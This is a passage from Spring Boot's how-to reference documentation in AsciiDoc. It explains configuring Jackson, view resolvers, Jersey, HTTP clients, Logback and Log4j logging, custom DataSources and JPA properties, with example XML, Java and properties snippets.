project:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependency>\n\t\t<groupId>org.glassfish.jaxb<\/groupId>\n\t\t<artifactId>jaxb-runtime<\/artifactId>\n\t<\/dependency>\n----\n\nNOTE: To get the server to render XML instead of JSON, you might have to send an `Accept: text\/xml` header (or use a browser).\n\n\n\n[[howto-customize-the-jackson-objectmapper]]\n=== Customize the Jackson ObjectMapper\nSpring MVC (client and server side) uses `HttpMessageConverters` to negotiate content conversion in an HTTP exchange.\nIf Jackson is on the classpath, you already get the default converter(s) provided by `Jackson2ObjectMapperBuilder`, an instance of which is auto-configured for you.\n\nThe `ObjectMapper` (or `XmlMapper` for Jackson XML converter) instance (created by default) has the following customized properties:\n\n* `MapperFeature.DEFAULT_VIEW_INCLUSION` is disabled\n* `DeserializationFeature.FAIL_ON_UNKNOWN_PROPERTIES` is disabled\n* `SerializationFeature.WRITE_DATES_AS_TIMESTAMPS` is disabled\n\nSpring Boot also has some features to make it easier to customize this behavior.\n\nYou can configure the `ObjectMapper` and `XmlMapper` instances by using the environment.\nJackson provides an extensive suite of simple on\/off features that can be used to configure various aspects of its processing.\nThese features are described in six enums (in Jackson) that map onto properties in the environment:\n\n|===\n| Enum | Property | Values\n\n| `com.fasterxml.jackson.databind.DeserializationFeature`\n| `spring.jackson.deserialization.<feature_name>`\n| `true`, `false`\n\n| `com.fasterxml.jackson.core.JsonGenerator.Feature`\n| `spring.jackson.generator.<feature_name>`\n| `true`, `false`\n\n| `com.fasterxml.jackson.databind.MapperFeature`\n| `spring.jackson.mapper.<feature_name>`\n| `true`, `false`\n\n| `com.fasterxml.jackson.core.JsonParser.Feature`\n| `spring.jackson.parser.<feature_name>`\n| `true`, `false`\n\n| `com.fasterxml.jackson.databind.SerializationFeature`\n| `spring.jackson.serialization.<feature_name>`\n| `true`, `false`\n\n| `com.fasterxml.jackson.annotation.JsonInclude.Include`\n| configprop:spring.jackson.default-property-inclusion[]\n| `always`, `non_null`, `non_absent`, `non_default`, `non_empty`\n|===\n\nFor example, to enable pretty print, set `spring.jackson.serialization.indent_output=true`.\nNote that, thanks to the use of <<spring-boot-features.adoc#boot-features-external-config-relaxed-binding, relaxed binding>>, the case of `indent_output` does not have to match the case of the corresponding enum constant, which is `INDENT_OUTPUT`.\n\nThis environment-based configuration is applied to the auto-configured `Jackson2ObjectMapperBuilder` bean and applies to any mappers created by using the builder, including the auto-configured `ObjectMapper` bean.\n\nThe context's `Jackson2ObjectMapperBuilder` can be customized by one or more `Jackson2ObjectMapperBuilderCustomizer` beans.\nSuch customizer beans can be ordered (Boot's own customizer has an order of 0), letting additional customization be applied both before and after Boot's customization.\n\nAny beans of type `com.fasterxml.jackson.databind.Module` are automatically registered with the auto-configured `Jackson2ObjectMapperBuilder` and are applied to any `ObjectMapper` instances that it creates.\nThis provides a global mechanism for contributing custom modules when you add new features to your application.\n\nIf you want to replace the default `ObjectMapper` completely, either define a `@Bean` of that type and mark it as `@Primary` or, if you prefer the builder-based approach, define a `Jackson2ObjectMapperBuilder` `@Bean`.\nNote that, in either case, doing so disables all auto-configuration of the `ObjectMapper`.\n\nIf you provide any `@Beans` of type `MappingJackson2HttpMessageConverter`, they replace the default value in the MVC configuration.\nAlso, a convenience bean of type `HttpMessageConverters` is provided (and is always available if you use the default MVC configuration).\nIt has some useful methods to access the default and user-enhanced message converters.\n\nSee the \"`<<howto-customize-the-responsebody-rendering>>`\" section and the {spring-boot-autoconfigure-module-code}\/web\/servlet\/WebMvcAutoConfiguration.java[`WebMvcAutoConfiguration`] source code for more details.\n\n\n\n[[howto-customize-the-responsebody-rendering]]\n=== Customize the @ResponseBody Rendering\nSpring uses `HttpMessageConverters` to render `@ResponseBody` (or responses from `@RestController`).\nYou can contribute additional converters by adding beans of the appropriate type in a Spring Boot context.\nIf a bean you add is of a type that would have been included by default anyway (such as `MappingJackson2HttpMessageConverter` for JSON conversions), it replaces the default value.\nA convenience bean of type `HttpMessageConverters` is provided and is always available if you use the default MVC configuration.\nIt has some useful methods to access the default and user-enhanced message converters (For example, it can be useful if you want to manually inject them into a custom `RestTemplate`).\n\nAs in normal MVC usage, any `WebMvcConfigurer` beans that you provide can also contribute converters by overriding the `configureMessageConverters` method.\nHowever, unlike with normal MVC, you can supply only additional converters that you need (because Spring Boot uses the same mechanism to contribute its defaults).\nFinally, if you opt out of the Spring Boot default MVC configuration by providing your own `@EnableWebMvc` configuration, you can take control completely and do everything manually by using `getMessageConverters` from `WebMvcConfigurationSupport`.\n\nSee the {spring-boot-autoconfigure-module-code}\/web\/servlet\/WebMvcAutoConfiguration.java[`WebMvcAutoConfiguration`] source code for more details.\n\n\n\n[[howto-multipart-file-upload-configuration]]\n=== Handling Multipart File Uploads\nSpring Boot embraces the Servlet 3 `javax.servlet.http.Part` API to support uploading files.\nBy default, Spring Boot configures Spring MVC with a maximum size of 1MB per file and a maximum of 10MB of file data in a single request.\nYou may override these values, the location to which intermediate data is stored (for example, to the `\/tmp` directory), and the threshold past which data is flushed to disk by using the properties exposed in the `MultipartProperties` class.\nFor example, if you want to specify that files be unlimited, set the configprop:spring.servlet.multipart.max-file-size[] property to `-1`.\n\nThe multipart support is helpful when you want to receive multipart encoded file data as a `@RequestParam`-annotated parameter of type `MultipartFile` in a Spring MVC controller handler method.\n\nSee the {spring-boot-autoconfigure-module-code}\/web\/servlet\/MultipartAutoConfiguration.java[`MultipartAutoConfiguration`] source for more details.\n\nNOTE: It is recommended to use the container's built-in support for multipart uploads rather than introducing an additional dependency such as Apache Commons File Upload.\n\n\n\n[[howto-switch-off-the-spring-mvc-dispatcherservlet]]\n=== Switch Off the Spring MVC DispatcherServlet\nBy default, all content is served from the root of your application (`\/`).\nIf you would rather map to a different path, you can configure one as follows:\n\n[source,properties,indent=0,subs=\"verbatim\",configprops]\n----\n\tspring.mvc.servlet.path=\/acme\n----\n\nIf you have additional servlets you can declare a `@Bean` of type `Servlet` or `ServletRegistrationBean` for each and Spring Boot will register them transparently to the container.\nBecause servlets are registered that way, they can be mapped to a sub-context of the `DispatcherServlet` without invoking it.\n\nConfiguring the `DispatcherServlet` yourself is unusual but if you really need to do it, a `@Bean` of type `DispatcherServletPath` must be provided as well to provide the path of your custom `DispatcherServlet`.\n\n\n\n[[howto-switch-off-default-mvc-configuration]]\n=== Switch off the Default MVC Configuration\nThe easiest way to take complete control over MVC configuration is to provide your own `@Configuration` with the `@EnableWebMvc` annotation.\nDoing so leaves all MVC configuration in your hands.\n\n\n\n[[howto-customize-view-resolvers]]\n=== Customize ViewResolvers\nA `ViewResolver` is a core component of Spring MVC, translating view names in `@Controller` to actual `View` implementations.\nNote that `ViewResolvers` are mainly used in UI applications, rather than REST-style services (a `View` is not used to render a `@ResponseBody`).\nThere are many implementations of `ViewResolver` to choose from, and Spring on its own is not opinionated about which ones you should use.\nSpring Boot, on the other hand, installs one or two for you, depending on what it finds on the classpath and in the application context.\nThe `DispatcherServlet` uses all the resolvers it finds in the application context, trying each one in turn until it gets a result.\nIf you add your own, you have to be aware of the order and in which position your resolver is added.\n\n`WebMvcAutoConfiguration` adds the following `ViewResolvers` to your context:\n\n* An `InternalResourceViewResolver` named '`defaultViewResolver`'.\n This one locates physical resources that can be rendered by using the `DefaultServlet` (including static resources and JSP pages, if you use those).\n It applies a prefix and a suffix to the view name and then looks for a physical resource with that path in the servlet context (the defaults are both empty but are accessible for external configuration through `spring.mvc.view.prefix` and `spring.mvc.view.suffix`).\n You can override it by providing a bean of the same type.\n* A `BeanNameViewResolver` named '`beanNameViewResolver`'.\n This is a useful member of the view resolver chain and picks up any beans with the same name as the `View` being resolved.\n It should not be necessary to override or replace it.\n* A `ContentNegotiatingViewResolver` named '`viewResolver`' is added only if there *are* actually beans of type `View` present.\n This is a '`master`' resolver, delegating to all the others and attempting to find a match to the '`Accept`' HTTP header sent by the client.\n There is a useful https:\/\/spring.io\/blog\/2013\/06\/03\/content-negotiation-using-views[blog about `ContentNegotiatingViewResolver`] that you might like to study to learn more, and you might also look at the source code for detail.\n You can switch off the auto-configured `ContentNegotiatingViewResolver` by defining a bean named '`viewResolver`'.\n* If you use Thymeleaf, you also have a `ThymeleafViewResolver` named '`thymeleafViewResolver`'.\n It looks for resources by surrounding the view name with a prefix and suffix.\n The prefix is `spring.thymeleaf.prefix`, and the suffix is `spring.thymeleaf.suffix`.\n The values of the prefix and suffix default to '`classpath:\/templates\/`' and '`.html`', respectively.\n You can override `ThymeleafViewResolver` by providing a bean of the same name.\n* If you use FreeMarker, you also have a `FreeMarkerViewResolver` named '`freeMarkerViewResolver`'.\n It looks for resources in a loader path (which is externalized to `spring.freemarker.templateLoaderPath` and has a default value of '`classpath:\/templates\/`') by surrounding the view name with a prefix and a suffix.\n The prefix is externalized to `spring.freemarker.prefix`, and the suffix is externalized to `spring.freemarker.suffix`.\n The default values of the prefix and suffix are empty and '`.ftlh`', respectively.\n You can override `FreeMarkerViewResolver` by providing a bean of the same name.\n* If you use Groovy templates (actually, if `groovy-templates` is on your classpath), you also have a `GroovyMarkupViewResolver` named '`groovyMarkupViewResolver`'.\n It looks for resources in a loader path by surrounding the view name with a prefix and suffix (externalized to `spring.groovy.template.prefix` and `spring.groovy.template.suffix`).\n The prefix and suffix have default values of '`classpath:\/templates\/`' and '`.tpl`', respectively.\n You can override `GroovyMarkupViewResolver` by providing a bean of the same name.\n* If you use Mustache, you also have a `MustacheViewResolver` named '`mustacheViewResolver`'.\n It looks for resources by surrounding the view name with a prefix and suffix.\n The prefix is `spring.mustache.prefix`, and the suffix is `spring.mustache.suffix`.\n The values of the prefix and suffix default to '`classpath:\/templates\/`' and '`.mustache`', respectively.\n You can override `MustacheViewResolver` by providing a bean of the same name.\n\nFor more detail, see the following sections:\n\n* {spring-boot-autoconfigure-module-code}\/web\/servlet\/WebMvcAutoConfiguration.java[`WebMvcAutoConfiguration`]\n* {spring-boot-autoconfigure-module-code}\/thymeleaf\/ThymeleafAutoConfiguration.java[`ThymeleafAutoConfiguration`]\n* {spring-boot-autoconfigure-module-code}\/freemarker\/FreeMarkerAutoConfiguration.java[`FreeMarkerAutoConfiguration`]\n* {spring-boot-autoconfigure-module-code}\/groovy\/template\/GroovyTemplateAutoConfiguration.java[`GroovyTemplateAutoConfiguration`]\n\n\n\n[[howto-use-test-with-spring-security]]\n== Testing With Spring Security\nSpring Security provides support for running tests as a specific user.\nFor example, the test in the snippet below will run with an authenticated user that has the `ADMIN` role.\n\n[source,java,indent=0]\n----\n\t@Test\n\t@WithMockUser(roles=\"ADMIN\")\n\tpublic void requestProtectedUrlWithUser() throws Exception {\n\t\tmvc\n\t\t\t.perform(get(\"\/\"))\n\t\t\t...\n\t}\n----\n\nSpring Security provides comprehensive integration with Spring MVC Test and this can also be used when testing controllers using the `@WebMvcTest` slice and `MockMvc`.\n\nFor additional details on Spring Security's testing support, refer to Spring Security's {spring-security-docs}#test[reference documentation]).\n\n\n\n[[howto-jersey]]\n== Jersey\n\n\n\n[[howto-jersey-spring-security]]\n=== Secure Jersey endpoints with Spring Security\nSpring Security can be used to secure a Jersey-based web application in much the same way as it can be used to secure a Spring MVC-based web application.\nHowever, if you want to use Spring Security's method-level security with Jersey, you must configure Jersey to use `setStatus(int)` rather `sendError(int)`.\nThis prevents Jersey from committing the response before Spring Security has had an opportunity to report an authentication or authorization failure to the client.\n\nThe `jersey.config.server.response.setStatusOverSendError` property must be set to `true` on the application's `ResourceConfig` bean, as shown in the following example:\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/jersey\/JerseySetStatusOverSendErrorExample.java[tag=resource-config]\n----\n\n\n\n[[howto-jersey-alongside-another-web-framework]]\n=== Use Jersey Alongside Another Web Framework\nTo use Jersey alongside another web framework, such as Spring MVC, it should be configured so that it will allow the other framework to handle requests that it cannot handle.\nFirst, configure Jersey to use a Filter rather than a Servlet by configuring the configprop:spring.jersey.type[] application property with a value of `filter`.\nSecond, configure your `ResourceConfig` to forward requests that would have resulted in a 404, as shown in the following example.\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Component\n\tpublic class JerseyConfig extends ResourceConfig {\n\n\t\tpublic JerseyConfig() {\n\t\t\tregister(Endpoint.class);\n\t\t\tproperty(ServletProperties.FILTER_FORWARD_ON_404, true);\n\t\t}\n\n\t}\n----\n\n\n\n[[howto-http-clients]]\n== HTTP Clients\nSpring Boot offers a number of starters that work with HTTP clients.\nThis section answers questions related to using them.\n\n\n\n[[howto-http-clients-proxy-configuration]]\n=== Configure RestTemplate to Use a Proxy\nAs described in <<spring-boot-features.adoc#boot-features-resttemplate-customization>>, you can use a `RestTemplateCustomizer` with `RestTemplateBuilder` to build a customized `RestTemplate`.\nThis is the recommended approach for creating a `RestTemplate` configured to use a proxy.\n\nThe exact details of the proxy configuration depend on the underlying client request factory that is being used.\nThe following example configures `HttpComponentsClientRequestFactory` with an `HttpClient` that uses a proxy for all hosts except `192.168.0.5`:\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/web\/client\/RestTemplateProxyCustomizationExample.java[tag=customizer]\n----\n\n[[howto-webclient-reactor-netty-customization]]\n=== Configure the TcpClient used by a Reactor Netty-based WebClient\nWhen Reactor Netty is on the classpath a Reactor Netty-based `WebClient` is auto-configured.\nTo customize the client's handling of network connections, provide a `ClientHttpConnector` bean.\nThe following example configures a 60 second connect timeout and adds a `ReadTimeoutHandler`:\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/web\/reactive\/function\/client\/ReactorNettyClientCustomizationExample.java[tag=custom-http-connector]\n----\n\nTIP: Note the use of `ReactorResourceFactory` for the connection provider and event loop resources.\nThis ensures efficient sharing of resources for the server receiving requests and the client making requests.\n\n\n[[howto-logging]]\n== Logging\nSpring Boot has no mandatory logging dependency, except for the Commons Logging API, which is typically provided by Spring Framework's `spring-jcl` module.\nTo use https:\/\/logback.qos.ch[Logback], you need to include it and `spring-jcl` on the classpath.\nThe simplest way to do that is through the starters, which all depend on `spring-boot-starter-logging`.\nFor a web application, you need only `spring-boot-starter-web`, since it depends transitively on the logging starter.\nIf you use Maven, the following dependency adds logging for you:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-web<\/artifactId>\n\t<\/dependency>\n----\n\nSpring Boot has a `LoggingSystem` abstraction that attempts to configure logging based on the content of the classpath.\nIf Logback is available, it is the first choice.\n\nIf the only change you need to make to logging is to set the levels of various loggers, you can do so in `application.properties` by using the \"logging.level\" prefix, as shown in the following example:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\",configprops]\n----\n\tlogging.level.org.springframework.web=DEBUG\n\tlogging.level.org.hibernate=ERROR\n----\n\nYou can also set the location of a file to which to write the log (in addition to the console) by using \"logging.file.name\".\n\nTo configure the more fine-grained settings of a logging system, you need to use the native configuration format supported by the `LoggingSystem` in question.\nBy default, Spring Boot picks up the native configuration from its default location for the system (such as `classpath:logback.xml` for Logback), but you can set the location of the config file by using the configprop:logging.config[] property.\n\n\n\n[[howto-configure-logback-for-logging]]\n=== Configure Logback for Logging\nIf you need to apply customizations to logback beyond those that can be achieved with `application.properties`, you'll need to add a standard logback configuration file.\nYou can add a `logback.xml` file to the root of your classpath for logback to find.\nYou can also use `logback-spring.xml` if you want to use the <<spring-boot-features.adoc#boot-features-logback-extensions,Spring Boot Logback extensions>>.\n\nTIP: The Logback documentation has a https:\/\/logback.qos.ch\/manual\/configuration.html[dedicated section that covers configuration] in some detail.\n\nSpring Boot provides a number of logback configurations that be `included` from your own configuration.\nThese includes are designed to allow certain common Spring Boot conventions to be re-applied.\n\nThe following files are provided under `org\/springframework\/boot\/logging\/logback\/`:\n\n* `defaults.xml` - Provides conversion rules, pattern properties and common logger configurations.\n* `console-appender.xml` - Adds a `ConsoleAppender` using the `CONSOLE_LOG_PATTERN`.\n* `file-appender.xml` - Adds a `RollingFileAppender` using the `FILE_LOG_PATTERN` and `ROLLING_FILE_NAME_PATTERN` with appropriate settings.\n\nIn addition, a legacy `base.xml` file is provided for compatibility with earlier versions of Spring Boot.\n\nA typical custom `logback.xml` file would look something like this:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<configuration>\n\t\t<include resource=\"org\/springframework\/boot\/logging\/logback\/defaults.xml\"\/>\n\t\t<include resource=\"org\/springframework\/boot\/logging\/logback\/console-appender.xml\" \/>\n\t\t<root level=\"INFO\">\n\t\t\t<appender-ref ref=\"CONSOLE\" \/>\n\t\t<\/root>\n\t\t<logger name=\"org.springframework.web\" level=\"DEBUG\"\/>\n\t<\/configuration>\n----\n\nYour logback configuration file can also make use of System properties that the `LoggingSystem` takes care of creating for you:\n\n* `$\\{PID}`: The current process ID.\n* `$\\{LOG_FILE}`: Whether `logging.file.name` was set in Boot's external configuration.\n* `$\\{LOG_PATH}`: Whether `logging.file.path` (representing a directory for log files to live in) was set in Boot's external configuration.\n* `$\\{LOG_EXCEPTION_CONVERSION_WORD}`: Whether `logging.exception-conversion-word` was set in Boot's external configuration.\n* `$\\{ROLLING_FILE_NAME_PATTERN}`: Whether `logging.pattern.rolling-file-name` was set in Boot's external configuration.\n\nSpring Boot also provides some nice ANSI color terminal output on a console (but not in a log file) by using a custom Logback converter.\nSee the `CONSOLE_LOG_PATTERN` in the `defaults.xml` configuration for an example.\n\nIf Groovy is on the classpath, you should be able to configure Logback with `logback.groovy` as well.\nIf present, this setting is given preference.\n\nNOTE: Spring extensions are not supported with Groovy configuration.\nAny `logback-spring.groovy` files will not be detected.\n\n\n\n[[howto-configure-logback-for-logging-fileonly]]\n==== Configure Logback for File-only Output\nIf you want to disable console logging and write output only to a file, you need a custom `logback-spring.xml` that imports `file-appender.xml` but not `console-appender.xml`, as shown in the following example:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<configuration>\n\t\t<include resource=\"org\/springframework\/boot\/logging\/logback\/defaults.xml\" \/>\n\t\t<property name=\"LOG_FILE\" value=\"${LOG_FILE:-${LOG_PATH:-${LOG_TEMP:-${java.io.tmpdir:-\/tmp}}\/}spring.log}\"\/>\n\t\t<include resource=\"org\/springframework\/boot\/logging\/logback\/file-appender.xml\" \/>\n\t\t<root level=\"INFO\">\n\t\t\t<appender-ref ref=\"FILE\" \/>\n\t\t<\/root>\n\t<\/configuration>\n----\n\nYou also need to add `logging.file.name` to your `application.properties`, as shown in the following example:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\",configprops]\n----\n\tlogging.file.name=myapplication.log\n----\n\n\n\n[[howto-configure-log4j-for-logging]]\n=== Configure Log4j for Logging\nSpring Boot supports https:\/\/logging.apache.org\/log4j\/2.x\/[Log4j 2] for logging configuration if it is on the classpath.\nIf you use the starters for assembling dependencies, you have to exclude Logback and then include log4j 2 instead.\nIf you do not use the starters, you need to provide (at least) `spring-jcl` in addition to Log4j 2.\n\nThe simplest path is probably through the starters, even though it requires some jiggling with excludes.\nThe following example shows how to set up the starters in Maven:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-web<\/artifactId>\n\t<\/dependency>\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter<\/artifactId>\n\t\t<exclusions>\n\t\t\t<exclusion>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-starter-logging<\/artifactId>\n\t\t\t<\/exclusion>\n\t\t<\/exclusions>\n\t<\/dependency>\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-log4j2<\/artifactId>\n\t<\/dependency>\n----\n\nAnd the following example shows one way to set up the starters in Gradle:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tdependencies {\n\t\timplementation 'org.springframework.boot:spring-boot-starter-web'\n\t\timplementation 'org.springframework.boot:spring-boot-starter-log4j2'\n\t}\n\n\tconfigurations {\n\t\tall {\n\t\t\texclude group: 'org.springframework.boot', module: 'spring-boot-starter-logging'\n\t\t}\n\t}\n----\n\nNOTE: The Log4j starters gather together the dependencies for common logging requirements (such as having Tomcat use `java.util.logging` but configuring the output using Log4j 2).\n\nNOTE: To ensure that debug logging performed using `java.util.logging` is routed into Log4j 2, configure its https:\/\/logging.apache.org\/log4j\/2.0\/log4j-jul\/index.html[JDK logging adapter] by setting the `java.util.logging.manager` system property to `org.apache.logging.log4j.jul.LogManager`.\n\n\n\n[[howto-configure-log4j-for-logging-yaml-or-json-config]]\n==== Use YAML or JSON to Configure Log4j 2\nIn addition to its default XML configuration format, Log4j 2 also supports YAML and JSON configuration files.\nTo configure Log4j 2 to use an alternative configuration file format, add the appropriate dependencies to the classpath and name your configuration files to match your chosen file format, as shown in the following example:\n\n[cols=\"10,75a,15a\"]\n|===\n| Format | Dependencies | File names\n\n|YAML\n| `com.fasterxml.jackson.core:jackson-databind` + `com.fasterxml.jackson.dataformat:jackson-dataformat-yaml`\n| `log4j2.yaml` + `log4j2.yml`\n\n|JSON\n| `com.fasterxml.jackson.core:jackson-databind`\n| `log4j2.json` + `log4j2.jsn`\n|===\n\n\n\n[[howto-data-access]]\n== Data Access\nSpring Boot includes a number of starters for working with data sources.\nThis section answers questions related to doing so.\n\n\n\n[[howto-configure-a-datasource]]\n=== Configure a Custom DataSource\nTo configure your own `DataSource`, define a `@Bean` of that type in your configuration.\nSpring Boot reuses your `DataSource` anywhere one is required, including database initialization.\nIf you need to externalize some settings, you can bind your `DataSource` to the environment (see \"`<<spring-boot-features.adoc#boot-features-external-config-3rd-party-configuration>>`\").\n\nThe following example shows how to define a data source in a bean:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\t@ConfigurationProperties(prefix=\"app.datasource\")\n\tpublic DataSource dataSource() {\n\t\treturn new FancyDataSource();\n\t}\n----\n\nThe following example shows how to define a data source by setting properties:\n\n[source,properties,indent=0]\n----\n\tapp.datasource.url=jdbc:h2:mem:mydb\n\tapp.datasource.username=sa\n\tapp.datasource.pool-size=30\n----\n\nAssuming that your `FancyDataSource` has regular JavaBean properties for the URL, the username, and the pool size, these settings are bound automatically before the `DataSource` is made available to other components.\nThe regular <<howto-initialize-a-database-using-spring-jdbc,database initialization>> also happens (so the relevant sub-set of `spring.datasource.*` can still be used with your custom configuration).\n\nSpring Boot also provides a utility builder class, called `DataSourceBuilder`, that can be used to create one of the standard data sources (if it is on the classpath).\nThe builder can detect the one to use based on what's available on the classpath.\nIt also auto-detects the driver based on the JDBC URL.\n\nThe following example shows how to create a data source by using a `DataSourceBuilder`:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\ninclude::{code-examples}\/jdbc\/BasicDataSourceExample.java[tag=configuration]\n----\n\nTo run an app with that `DataSource`, all you need is the connection information.\nPool-specific settings can also be provided.\nCheck the implementation that is going to be used at runtime for more details.\n\nThe following example shows how to define a JDBC data source by setting properties:\n\n[source,properties,indent=0]\n----\n\tapp.datasource.url=jdbc:mysql:\/\/localhost\/test\n\tapp.datasource.username=dbuser\n\tapp.datasource.password=dbpass\n\tapp.datasource.pool-size=30\n----\n\nHowever, there is a catch.\nBecause the actual type of the connection pool is not exposed, no keys are generated in the metadata for your custom `DataSource` and no completion is available in your IDE (because the `DataSource` interface exposes no properties).\nAlso, if you happen to have Hikari on the classpath, this basic setup does not work, because Hikari has no `url` property (but does have a `jdbcUrl` property).\nIn that case, you must rewrite your configuration as follows:\n\n[source,properties,indent=0]\n----\n\tapp.datasource.jdbc-url=jdbc:mysql:\/\/localhost\/test\n\tapp.datasource.username=dbuser\n\tapp.datasource.password=dbpass\n\tapp.datasource.maximum-pool-size=30\n----\n\nYou can fix that by forcing the connection pool to use and return a dedicated implementation rather than `DataSource`.\nYou cannot change the implementation at runtime, but the list of options will be explicit.\n\nThe following example shows how create a `HikariDataSource` with `DataSourceBuilder`:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\ninclude::{code-examples}\/jdbc\/SimpleDataSourceExample.java[tag=configuration]\n----\n\nYou can even go further by leveraging what `DataSourceProperties` does for you -- that is, by providing a default embedded database with a sensible username and password if no URL is provided.\nYou can easily initialize a `DataSourceBuilder` from the state of any `DataSourceProperties` object, so you could also inject the DataSource that Spring Boot creates automatically.\nHowever, that would split your configuration into two namespaces: `url`, `username`, `password`, `type`, and `driver` on `spring.datasource` and the rest on your custom namespace (`app.datasource`).\nTo avoid that, you can redefine a custom `DataSourceProperties` on your custom namespace, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\ninclude::{code-examples}\/jdbc\/ConfigurableDataSourceExample.java[tag=configuration]\n----\n\nThis setup puts you _in sync_ with what Spring Boot does for you by default, except that a dedicated connection pool is chosen (in code) and its settings are exposed in the `app.datasource.configuration` sub namespace.\nBecause `DataSourceProperties` is taking care of the `url`\/`jdbcUrl` translation for you, you can configure it as follows:\n\n[source,properties,indent=0]\n----\n\tapp.datasource.url=jdbc:mysql:\/\/localhost\/test\n\tapp.datasource.username=dbuser\n\tapp.datasource.password=dbpass\n\tapp.datasource.configuration.maximum-pool-size=30\n----\n\nTIP: Spring Boot will expose Hikari-specific settings to `spring.datasource.hikari`.\nThis example uses a more generic `configuration` sub namespace as the example does not support multiple datasource implementations.\n\nNOTE: Because your custom configuration chooses to go with Hikari, `app.datasource.type` has no effect.\nIn practice, the builder is initialized with whatever value you might set there and then overridden by the call to `.type()`.\n\nSee \"`<<spring-boot-features.adoc#boot-features-configure-datasource>>`\" in the \"`Spring Boot features`\" section and the {spring-boot-autoconfigure-module-code}\/jdbc\/DataSourceAutoConfiguration.java[`DataSourceAutoConfiguration`] class for more details.\n\n\n\n[[howto-two-datasources]]\n=== Configure Two DataSources\nIf you need to configure multiple data sources, you can apply the same tricks that are described in the previous section.\nYou must, however, mark one of the `DataSource` instances as `@Primary`, because various auto-configurations down the road expect to be able to get one by type.\n\nIf you create your own `DataSource`, the auto-configuration backs off.\nIn the following example, we provide the _exact_ same feature set as the auto-configuration provides on the primary data source:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\ninclude::{code-examples}\/jdbc\/SimpleTwoDataSourcesExample.java[tag=configuration]\n----\n\nTIP: `firstDataSourceProperties` has to be flagged as `@Primary` so that the database initializer feature uses your copy (if you use the initializer).\n\nBoth data sources are also bound for advanced customizations.\nFor instance, you could configure them as follows:\n\n[source,properties,indent=0]\n----\n\tapp.datasource.first.url=jdbc:mysql:\/\/localhost\/first\n\tapp.datasource.first.username=dbuser\n\tapp.datasource.first.password=dbpass\n\tapp.datasource.first.configuration.maximum-pool-size=30\n\n\tapp.datasource.second.url=jdbc:mysql:\/\/localhost\/second\n\tapp.datasource.second.username=dbuser\n\tapp.datasource.second.password=dbpass\n\tapp.datasource.second.max-total=30\n----\n\nYou can apply the same concept to the secondary `DataSource` as well, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\ninclude::{code-examples}\/jdbc\/CompleteTwoDataSourcesExample.java[tag=configuration]\n----\n\nThe preceding example configures two data sources on custom namespaces with the same logic as Spring Boot would use in auto-configuration.\nNote that each `configuration` sub namespace provides advanced settings based on the chosen implementation.\n\n\n\n[[howto-use-spring-data-repositories]]\n=== Use Spring Data Repositories\nSpring Data can create implementations of `@Repository` interfaces of various flavors.\nSpring Boot handles all of that for you, as long as those `@Repositories` are included in the same package (or a sub-package) of your `@EnableAutoConfiguration` class.\n\nFor many applications, all you need is to put the right Spring Data dependencies on your classpath.\nThere is a `spring-boot-starter-data-jpa` for JPA, `spring-boot-starter-data-mongodb` for Mongodb, etc.\nTo get started, create some repository interfaces to handle your `@Entity` objects.\n\nSpring Boot tries to guess the location of your `@Repository` definitions, based on the `@EnableAutoConfiguration` it finds.\nTo get more control, use the `@EnableJpaRepositories` annotation (from Spring Data JPA).\n\nFor more about Spring Data, see the {spring-data}[Spring Data project page].\n\n\n\n[[howto-separate-entity-definitions-from-spring-configuration]]\n=== Separate @Entity Definitions from Spring Configuration\nSpring Boot tries to guess the location of your `@Entity` definitions, based on the `@EnableAutoConfiguration` it finds.\nTo get more control, you can use the `@EntityScan` annotation, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Configuration(proxyBeanMethods = false)\n\t@EnableAutoConfiguration\n\t@EntityScan(basePackageClasses=City.class)\n\tpublic class Application {\n\n\t\t\/\/...\n\n\t}\n----\n\n\n\n[[howto-configure-jpa-properties]]\n=== Configure JPA Properties\nSpring Data JPA already provides some vendor-independent configuration options (such as those for SQL logging), and Spring Boot exposes those options and a few more for Hibernate as external configuration properties.\nSome of them are automatically detected according to the context so you should not have to set them.\n\nThe `spring.jpa.hibernate.ddl-auto` is a special case, because, depending on runtime conditions, it has different defaults.\nIf an embedded database is used and no schema manager (such as Liquibase or Flyway) is handling the `DataSource`, it defaults to `create-drop`.\nIn all other cases, it defaults to `none`.\n\nThe dialect to use is detected by the JPA provider.\nIf you prefer to set the dialect yourself, set the configprop:spring.jpa.database-platform[] property.\n\nThe most common options to set are shown in the following example:\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.jpa.hibernate.naming.physical-strategy=com.example.MyPhysicalNamingStrategy\n\tspring.jpa.show-sql=true\n----\n\nIn 